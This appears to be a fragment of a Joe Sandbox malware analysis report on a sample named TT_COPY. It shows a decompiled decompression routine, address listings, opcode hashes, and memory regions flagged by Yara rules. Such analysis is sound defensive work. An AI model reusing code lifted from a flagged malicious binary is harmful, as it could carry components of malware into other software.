                                                                                                                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                                                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                                            				signed int _v8;
                                                                                                                            				unsigned int _v12;
                                                                                                                            				signed int _v16;
                                                                                                                            				intOrPtr _v20;
                                                                                                                            				signed int _v24;
                                                                                                                            				signed int _v28;
                                                                                                                            				intOrPtr* _v32;
                                                                                                                            				signed int* _v36;
                                                                                                                            				signed int _v40;
                                                                                                                            				signed int _v44;
                                                                                                                            				intOrPtr _v48;
                                                                                                                            				intOrPtr _v52;
                                                                                                                            				void _v116;
                                                                                                                            				signed int _v176;
                                                                                                                            				signed int _v180;
                                                                                                                            				signed int _v240;
                                                                                                                            				signed int _t166;
                                                                                                                            				signed int _t168;
                                                                                                                            				intOrPtr _t175;
                                                                                                                            				signed int _t181;
                                                                                                                            				void* _t182;
                                                                                                                            				intOrPtr _t183;
                                                                                                                            				signed int* _t184;
                                                                                                                            				signed int _t186;
                                                                                                                            				signed int _t187;
                                                                                                                            				signed int* _t189;
                                                                                                                            				signed int _t190;
                                                                                                                            				intOrPtr* _t191;
                                                                                                                            				intOrPtr _t192;
                                                                                                                            				signed int _t193;
                                                                                                                            				signed int _t195;
                                                                                                                            				signed int _t200;
                                                                                                                            				signed int _t205;
                                                                                                                            				void* _t207;
                                                                                                                            				short _t208;
                                                                                                                            				signed char _t222;
                                                                                                                            				signed int _t224;
                                                                                                                            				signed int _t225;
                                                                                                                            				signed int* _t232;
                                                                                                                            				signed int _t233;
                                                                                                                            				signed int _t234;
                                                                                                                            				void* _t235;
                                                                                                                            				signed int _t236;
                                                                                                                            				signed int _t244;
                                                                                                                            				signed int _t246;
                                                                                                                            				signed int _t251;
                                                                                                                            				signed int _t254;
                                                                                                                            				signed int _t256;
                                                                                                                            				signed int _t259;
                                                                                                                            				signed int _t262;
                                                                                                                            				void* _t263;
                                                                                                                            				void* _t264;
                                                                                                                            				signed int _t267;
                                                                                                                            				intOrPtr _t269;
                                                                                                                            				intOrPtr _t271;
                                                                                                                            				signed int _t274;
                                                                                                                            				intOrPtr* _t275;
                                                                                                                            				unsigned int _t276;
                                                                                                                            				void* _t277;
                                                                                                                            				signed int _t278;
                                                                                                                            				intOrPtr* _t279;
                                                                                                                            				signed int _t281;
                                                                                                                            				intOrPtr _t282;
                                                                                                                            				intOrPtr _t283;
                                                                                                                            				signed int* _t284;
                                                                                                                            				signed int _t286;
                                                                                                                            				signed int _t287;
                                                                                                                            				signed int _t288;
                                                                                                                            				signed int _t296;
                                                                                                                            				signed int* _t297;
                                                                                                                            				intOrPtr _t298;
                                                                                                                            				void* _t299;
                                                                                                                            
                                                                                                                            				_t278 = _a8;
                                                                                                                            				_t187 = 0x10;
                                                                                                                            				memset( &_v116, 0, _t187 << 2);
                                                                                                                            				_t189 = _a4;
                                                                                                                            				_t233 = _t278;
                                                                                                                            				do {
                                                                                                                            					_t166 =  *_t189;
                                                                                                                            					_t189 =  &(_t189[1]);
                                                                                                                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                                            					_t233 = _t233 - 1;
                                                                                                                            				} while (_t233 != 0);
                                                                                                                            				if(_v116 != _t278) {
                                                                                                                            					_t279 = _a28;
                                                                                                                            					_t267 =  *_t279;
                                                                                                                            					_t190 = 1;
                                                                                                                            					_a28 = _t267;
                                                                                                                            					_t234 = 0xf;
                                                                                                                            					while(1) {
                                                                                                                            						_t168 = 0;
                                                                                                                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                                            							break;
                                                                                                                            						}
                                                                                                                            						_t190 = _t190 + 1;
                                                                                                                            						if(_t190 <= _t234) {
                                                                                                                            							continue;
                                                                                                                            						}
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					_v8 = _t190;
                                                                                                                            					if(_t267 < _t190) {
                                                                                                                            						_a28 = _t190;
                                                                                                                            					}
                                                                                                                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                                            						_t234 = _t234 - 1;
                                                                                                                            						if(_t234 != 0) {
                                                                                                                            							continue;
                                                                                                                            						}
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					_v28 = _t234;
                                                                                                                            					if(_a28 > _t234) {
                                                                                                                            						_a28 = _t234;
                                                                                                                            					}
                                                                                                                            					 *_t279 = _a28;
                                                                                                                            					_t181 = 1 << _t190;
                                                                                                                            					while(_t190 < _t234) {
                                                                                                                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                                            						if(_t182 < 0) {
                                                                                                                            							L64:
                                                                                                                            							return _t168 | 0xffffffff;
                                                                                                                            						}
                                                                                                                            						_t190 = _t190 + 1;
                                                                                                                            						_t181 = _t182 + _t182;
                                                                                                                            					}
                                                                                                                            					_t281 = _t234 << 2;
                                                                                                                            					_t191 = _t299 + _t281 - 0x70;
                                                                                                                            					_t269 =  *_t191;
                                                                                                                            					_t183 = _t181 - _t269;
                                                                                                                            					_v52 = _t183;
                                                                                                                            					if(_t183 < 0) {
                                                                                                                            						goto L64;
                                                                                                                            					}
                                                                                                                            					_v176 = _t168;
                                                                                                                            					 *_t191 = _t269 + _t183;
                                                                                                                            					_t192 = 0;
                                                                                                                            					_t235 = _t234 - 1;
                                                                                                                            					if(_t235 == 0) {
                                                                                                                            						L21:
                                                                                                                            						_t184 = _a4;
                                                                                                                            						_t271 = 0;
                                                                                                                            						do {
                                                                                                                            							_t193 =  *_t184;
                                                                                                                            							_t184 =  &(_t184[1]);
                                                                                                                            							if(_t193 != _t168) {
                                                                                                                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                                            								_t236 =  *_t232;
                                                                                                                            								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                                                                            								 *_t232 = _t236 + 1;
                                                                                                                            							}
                                                                                                                            							_t271 = _t271 + 1;
                                                                                                                            						} while (_t271 < _a8);
                                                                                                                            						_v16 = _v16 | 0xffffffff;
                                                                                                                            						_v40 = _v40 & 0x00000000;
                                                                                                                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                                            						_t195 = _v8;
                                                                                                                            						_t186 =  ~_a28;
                                                                                                                            						_v12 = _t168;
                                                                                                                            						_v180 = _t168;
                                                                                                                            						_v36 = 0x432190;
                                                                                                                            						_v240 = _t168;
                                                                                                                            						if(_t195 > _v28) {
                                                                                                                            							L62:
                                                                                                                            							_t168 = 0;
                                                                                                                            							if(_v52 == 0 || _v28 == 1) {
                                                                                                                            								return _t168;
                                                                                                                            							} else {
                                                                                                                            								goto L64;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						_v44 = _t195 - 1;
                                                                                                                            						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                                            						do {
                                                                                                                            							_t282 =  *_v32;
                                                                                                                            							if(_t282 == 0) {
                                                                                                                            								goto L61;
                                                                                                                            							}
                                                                                                                            							while(1) {
                                                                                                                            								_t283 = _t282 - 1;
                                                                                                                            								_t200 = _a28 + _t186;
                                                                                                                            								_v48 = _t283;
                                                                                                                            								_v24 = _t200;
                                                                                                                            								if(_v8 <= _t200) {
                                                                                                                            									goto L45;
                                                                                                                            								}
                                                                                                                            								L31:
                                                                                                                            								_v20 = _t283 + 1;
                                                                                                                            								do {
                                                                                                                            									_v16 = _v16 + 1;
                                                                                                                            									_t296 = _v28 - _v24;
                                                                                                                            									if(_t296 > _a28) {
                                                                                                                            										_t296 = _a28;
                                                                                                                            									}
                                                                                                                            									_t222 = _v8 - _v24;
                                                                                                                            									_t254 = 1 << _t222;
                                                                                                                            									if(1 <= _v20) {
                                                                                                                            										L40:
                                                                                                                            										_t256 =  *_a36;
                                                                                                                            										_t168 = 1 << _t222;
                                                                                                                            										_v40 = 1;
                                                                                                                            										_t274 = _t256 + 1;
                                                                                                                            										if(_t274 > 0x5a0) {
                                                                                                                            											goto L64;
                                                                                                                            										}
                                                                                                                            									} else {
                                                                                                                            										_t275 = _v32;
                                                                                                                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                                            										if(_t222 >= _t296) {
                                                                                                                            											goto L40;
                                                                                                                            										}
                                                                                                                            										while(1) {
                                                                                                                            											_t222 = _t222 + 1;
                                                                                                                            											if(_t222 >= _t296) {
                                                                                                                            												goto L40;
                                                                                                                            											}
                                                                                                                            											_t275 = _t275 + 4;
                                                                                                                            											_t264 = _t263 + _t263;
                                                                                                                            											_t175 =  *_t275;
                                                                                                                            											if(_t264 <= _t175) {
                                                                                                                            												goto L40;
                                                                                                                            											}
                                                                                                                            											_t263 = _t264 - _t175;
                                                                                                                            										}
                                                                                                                            										goto L40;
                                                                                                                            									}
                                                                                                                            									_t168 = _a32 + _t256 * 4;
                                                                                                                            									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                                            									 *_a36 = _t274;
                                                                                                                            									_t259 = _v16;
                                                                                                                            									 *_t297 = _t168;
                                                                                                                            									if(_t259 == 0) {
                                                                                                                            										 *_a24 = _t168;
                                                                                                                            									} else {
                                                                                                                            										_t276 = _v12;
                                                                                                                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                                            										_a5 = _a28;
                                                                                                                            										_a4 = _t222;
                                                                                                                            										_t262 = _t276 >> _t186;
                                                                                                                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                                            										 *(_t298 + _t262 * 4) = _a4;
                                                                                                                            									}
                                                                                                                            									_t224 = _v24;
                                                                                                                            									_t186 = _t224;
                                                                                                                            									_t225 = _t224 + _a28;
                                                                                                                            									_v24 = _t225;
                                                                                                                            								} while (_v8 > _t225);
                                                                                                                            								L45:
                                                                                                                            								_t284 = _v36;
                                                                                                                            								_a5 = _v8 - _t186;
                                                                                                                            								if(_t284 < 0x432190 + _a8 * 4) {
                                                                                                                            									_t205 =  *_t284;
                                                                                                                            									if(_t205 >= _a12) {
                                                                                                                            										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                                            										_v36 =  &(_v36[1]);
                                                                                                                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                                            									} else {
                                                                                                                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                                            										_t208 =  *_t284;
                                                                                                                            										_v36 =  &(_t284[1]);
                                                                                                                            									}
                                                                                                                            									_a6 = _t208;
                                                                                                                            								} else {
                                                                                                                            									_a4 = 0xc0;
                                                                                                                            								}
                                                                                                                            								_t286 = 1 << _v8 - _t186;
                                                                                                                            								_t244 = _v12 >> _t186;
                                                                                                                            								while(_t244 < _v40) {
                                                                                                                            									 *(_t168 + _t244 * 4) = _a4;
                                                                                                                            									_t244 = _t244 + _t286;
                                                                                                                            								}
                                                                                                                            								_t287 = _v12;
                                                                                                                            								_t246 = 1 << _v44;
                                                                                                                            								while((_t287 & _t246) != 0) {
                                                                                                                            									_t287 = _t287 ^ _t246;
                                                                                                                            									_t246 = _t246 >> 1;
                                                                                                                            								}
                                                                                                                            								_t288 = _t287 ^ _t246;
                                                                                                                            								_v20 = 1;
                                                                                                                            								_v12 = _t288;
                                                                                                                            								_t251 = _v16;
                                                                                                                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                                            									L60:
                                                                                                                            									if(_v48 != 0) {
                                                                                                                            										_t282 = _v48;
                                                                                                                            										_t283 = _t282 - 1;
                                                                                                                            										_t200 = _a28 + _t186;
                                                                                                                            										_v48 = _t283;
                                                                                                                            										_v24 = _t200;
                                                                                                                            										if(_v8 <= _t200) {
                                                                                                                            											goto L45;
                                                                                                                            										}
                                                                                                                            										goto L31;
                                                                                                                            									}
                                                                                                                            									break;
                                                                                                                            								} else {
                                                                                                                            									goto L58;
                                                                                                                            								}
                                                                                                                            								do {
                                                                                                                            									L58:
                                                                                                                            									_t186 = _t186 - _a28;
                                                                                                                            									_t251 = _t251 - 1;
                                                                                                                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                                            								_v16 = _t251;
                                                                                                                            								goto L60;
                                                                                                                            							}
                                                                                                                            							L61:
                                                                                                                            							_v8 = _v8 + 1;
                                                                                                                            							_v32 = _v32 + 4;
                                                                                                                            							_v44 = _v44 + 1;
                                                                                                                            						} while (_v8 <= _v28);
                                                                                                                            						goto L62;
                                                                                                                            					}
                                                                                                                            					_t277 = 0;
                                                                                                                            					do {
                                                                                                                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                                            						_t277 = _t277 + 4;
                                                                                                                            						_t235 = _t235 - 1;
                                                                                                                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                                            					} while (_t235 != 0);
                                                                                                                            					goto L21;
                                                                                                                            				}
                                                                                                                            				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                            				 *_a28 =  *_a28 & 0x00000000;
                                                                                                                            				return 0;
                                                                                                                            			}











































































                                                                                                                            0x00407567
                                                                                                                            0x0040756f
                                                                                                                            0x00407573
                                                                                                                            0x00407575
                                                                                                                            0x00407578
                                                                                                                            0x0040757a
                                                                                                                            0x0040757a
                                                                                                                            0x0040757c
                                                                                                                            0x00407583
                                                                                                                            0x00407585
                                                                                                                            0x00407585
                                                                                                                            0x0040758b
                                                                                                                            0x004075a0
                                                                                                                            0x004075a8
                                                                                                                            0x004075aa
                                                                                                                            0x004075ac
                                                                                                                            0x004075af
                                                                                                                            0x004075b0
                                                                                                                            0x004075b0
                                                                                                                            0x004075b6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004075b8
                                                                                                                            0x004075bb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004075bb
                                                                                                                            0x004075bf
                                                                                                                            0x004075c2
                                                                                                                            0x004075c4
                                                                                                                            0x004075c4
                                                                                                                            0x004075c7
                                                                                                                            0x004075cd
                                                                                                                            0x004075ce
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004075ce
                                                                                                                            0x004075d3
                                                                                                                            0x004075d6
                                                                                                                            0x004075d8
                                                                                                                            0x004075d8
                                                                                                                            0x004075de
                                                                                                                            0x004075e0
                                                                                                                            0x004075f1
                                                                                                                            0x004075e4
                                                                                                                            0x004075e8
                                                                                                                            0x0040788d
                                                                                                                            0x00000000
                                                                                                                            0x0040788d
                                                                                                                            0x004075ee
                                                                                                                            0x004075ef
                                                                                                                            0x004075ef
                                                                                                                            0x004075f7
                                                                                                                            0x004075fa
                                                                                                                            0x004075fe
                                                                                                                            0x00407600
                                                                                                                            0x00407602
                                                                                                                            0x00407605
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040760d
                                                                                                                            0x00407613
                                                                                                                            0x00407615
                                                                                                                            0x00407617
                                                                                                                            0x00407618
                                                                                                                            0x0040762d
                                                                                                                            0x0040762d
                                                                                                                            0x00407630
                                                                                                                            0x00407632
                                                                                                                            0x00407632
                                                                                                                            0x00407634
                                                                                                                            0x00407639
                                                                                                                            0x0040763b
                                                                                                                            0x00407642
                                                                                                                            0x00407644
                                                                                                                            0x0040764c
                                                                                                                            0x0040764c
                                                                                                                            0x0040764e
                                                                                                                            0x0040764f
                                                                                                                            0x0040765e
                                                                                                                            0x00407662
                                                                                                                            0x00407666
                                                                                                                            0x00407669
                                                                                                                            0x0040766c
                                                                                                                            0x00407671
                                                                                                                            0x00407674
                                                                                                                            0x0040767a
                                                                                                                            0x00407681
                                                                                                                            0x00407687
                                                                                                                            0x00407880
                                                                                                                            0x00407880
                                                                                                                            0x00407885
                                                                                                                            0x00407894
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407885
                                                                                                                            0x00407694
                                                                                                                            0x00407697
                                                                                                                            0x0040769a
                                                                                                                            0x0040769d
                                                                                                                            0x004076a1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004076ac
                                                                                                                            0x004076af
                                                                                                                            0x004076b0
                                                                                                                            0x004076b2
                                                                                                                            0x004076b8
                                                                                                                            0x004076bb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004076c1
                                                                                                                            0x004076c2
                                                                                                                            0x004076c5
                                                                                                                            0x004076c8
                                                                                                                            0x004076cb
                                                                                                                            0x004076d1
                                                                                                                            0x004076d3
                                                                                                                            0x004076d3
                                                                                                                            0x004076db
                                                                                                                            0x004076df
                                                                                                                            0x004076e4
                                                                                                                            0x00407709
                                                                                                                            0x0040770f
                                                                                                                            0x00407711
                                                                                                                            0x00407713
                                                                                                                            0x00407716
                                                                                                                            0x0040771f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004076e6
                                                                                                                            0x004076e6
                                                                                                                            0x004076ef
                                                                                                                            0x004076f3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407704
                                                                                                                            0x00407704
                                                                                                                            0x00407707
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004076f7
                                                                                                                            0x004076fa
                                                                                                                            0x004076fc
                                                                                                                            0x00407700
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407702
                                                                                                                            0x00407702
                                                                                                                            0x00000000
                                                                                                                            0x00407704
                                                                                                                            0x00407728
                                                                                                                            0x0040772e
                                                                                                                            0x00407738
                                                                                                                            0x0040773a
                                                                                                                            0x0040773f
                                                                                                                            0x00407741
                                                                                                                            0x00407777
                                                                                                                            0x00407743
                                                                                                                            0x00407743
                                                                                                                            0x00407746
                                                                                                                            0x00407749
                                                                                                                            0x00407753
                                                                                                                            0x00407756
                                                                                                                            0x0040775d
                                                                                                                            0x00407768
                                                                                                                            0x0040776f
                                                                                                                            0x0040776f
                                                                                                                            0x00407779
                                                                                                                            0x0040777c
                                                                                                                            0x0040777e
                                                                                                                            0x00407784
                                                                                                                            0x00407784
                                                                                                                            0x0040778d
                                                                                                                            0x00407790
                                                                                                                            0x00407795
                                                                                                                            0x004077a4
                                                                                                                            0x004077ac
                                                                                                                            0x004077b1
                                                                                                                            0x004077d5
                                                                                                                            0x004077dd
                                                                                                                            0x004077e1
                                                                                                                            0x004077e7
                                                                                                                            0x004077b3
                                                                                                                            0x004077c1
                                                                                                                            0x004077c4
                                                                                                                            0x004077ca
                                                                                                                            0x004077ca
                                                                                                                            0x004077eb
                                                                                                                            0x004077a6
                                                                                                                            0x004077a6
                                                                                                                            0x004077a6
                                                                                                                            0x004077fc
                                                                                                                            0x00407800
                                                                                                                            0x0040780c
                                                                                                                            0x00407807
                                                                                                                            0x0040780a
                                                                                                                            0x0040780a
                                                                                                                            0x00407814
                                                                                                                            0x00407819
                                                                                                                            0x00407821
                                                                                                                            0x0040781d
                                                                                                                            0x0040781f
                                                                                                                            0x0040781f
                                                                                                                            0x00407827
                                                                                                                            0x00407829
                                                                                                                            0x00407830
                                                                                                                            0x0040783a
                                                                                                                            0x00407844
                                                                                                                            0x00407860
                                                                                                                            0x00407864
                                                                                                                            0x004076a9
                                                                                                                            0x004076af
                                                                                                                            0x004076b0
                                                                                                                            0x004076b2
                                                                                                                            0x004076b8
                                                                                                                            0x004076bb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004076bb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407846
                                                                                                                            0x00407846
                                                                                                                            0x00407846
                                                                                                                            0x0040784b
                                                                                                                            0x00407854
                                                                                                                            0x0040785d
                                                                                                                            0x00000000
                                                                                                                            0x0040785d
                                                                                                                            0x0040786a
                                                                                                                            0x0040786a
                                                                                                                            0x0040786d
                                                                                                                            0x00407874
                                                                                                                            0x00407877
                                                                                                                            0x00000000
                                                                                                                            0x0040769a
                                                                                                                            0x0040761a
                                                                                                                            0x0040761c
                                                                                                                            0x0040761c
                                                                                                                            0x00407620
                                                                                                                            0x00407623
                                                                                                                            0x00407624
                                                                                                                            0x00407624
                                                                                                                            0x00000000
                                                                                                                            0x0040761c
                                                                                                                            0x00407590
                                                                                                                            0x00407596
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 24d699b826631b08ecb7d54c7a32f05961ec27010a7b0eb8b33568a49da45f1c
                                                                                                                            • Instruction ID: 60d9a23ffca49fe30159ded41c7df5769a35c9a93aadc6fe6df532e4362f7a66
                                                                                                                            • Opcode Fuzzy Hash: 24d699b826631b08ecb7d54c7a32f05961ec27010a7b0eb8b33568a49da45f1c
                                                                                                                            • Instruction Fuzzy Hash: 6EA1F6716183898FCF368E2889593F637E1BFC9310F9182D9CC4D8B21AD7395686CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a40d5a750441f943b098e7c4f1e5b3b18f5d8d27743c288e99922b6c74192e38
                                                                                                                            • Instruction ID: 593c15e8e7d451d47ed217ad4c29bb3967ee71f724f0373c43e4795ec8067be5
                                                                                                                            • Opcode Fuzzy Hash: a40d5a750441f943b098e7c4f1e5b3b18f5d8d27743c288e99922b6c74192e38
                                                                                                                            • Instruction Fuzzy Hash: 0BA1467160434ADFDB358E38C9993EA37B2FF55354F9541AECC8A8B642D7348A86CB01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 71884b60de78adc4315a1476efa87e66e6ae03a8edd29812b1645c1ee919d97d
                                                                                                                            • Instruction ID: 2cbc1ac359d1268fb162696b0a32256b61801bc1981d2ea0caacb506887f987e
                                                                                                                            • Opcode Fuzzy Hash: 71884b60de78adc4315a1476efa87e66e6ae03a8edd29812b1645c1ee919d97d
                                                                                                                            • Instruction Fuzzy Hash: 55A13C716083898FCF75CF7989683EA3BA2BF89310F54829ACC4D8F25AD7355A46C711
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf0bf96d8bc0fde174d5db525b3843ca85ae5b3b16b9effadf94bc6847d1d44a
                                                                                                                            • Instruction ID: ee7ccb816f4c1da7b3a63dca3670eb32f1753886bff6fa6ebe19cdbcadcc6d23
                                                                                                                            • Opcode Fuzzy Hash: bf0bf96d8bc0fde174d5db525b3843ca85ae5b3b16b9effadf94bc6847d1d44a
                                                                                                                            • Instruction Fuzzy Hash: 899139716083898FCF759E7989683EA7BA2BF89300F5482EECC498F21AD7755642C711
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a5f2cfc7edc279949d216e616df983aaf20d050ceb462fcc2f51e30aa7fe5b41
                                                                                                                            • Instruction ID: cddf65bd32cbd45343fb2585b9ab2ba74b626df9791a42ea56804db70a903fb0
                                                                                                                            • Opcode Fuzzy Hash: a5f2cfc7edc279949d216e616df983aaf20d050ceb462fcc2f51e30aa7fe5b41
                                                                                                                            • Instruction Fuzzy Hash: 2D8115716183898FCF75CE6989583EA37E2BF89310F90829ACC8DCB319D7355A46CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8dc8dd396abf33f0cf883e55583d0e541adceaf8f2a214b1c5183cc0907cd9b8
                                                                                                                            • Instruction ID: c733c3ac61ac2adf88239d3cd5da4c1958eba3e7e2b9b767cbbf8115497a10f5
                                                                                                                            • Opcode Fuzzy Hash: 8dc8dd396abf33f0cf883e55583d0e541adceaf8f2a214b1c5183cc0907cd9b8
                                                                                                                            • Instruction Fuzzy Hash: 9D9125316043898FDF78CE69C9A83EA37A2FF99300F54816ACC4E8B319D7759A41CB11
                                                                                                                            Uniqueness

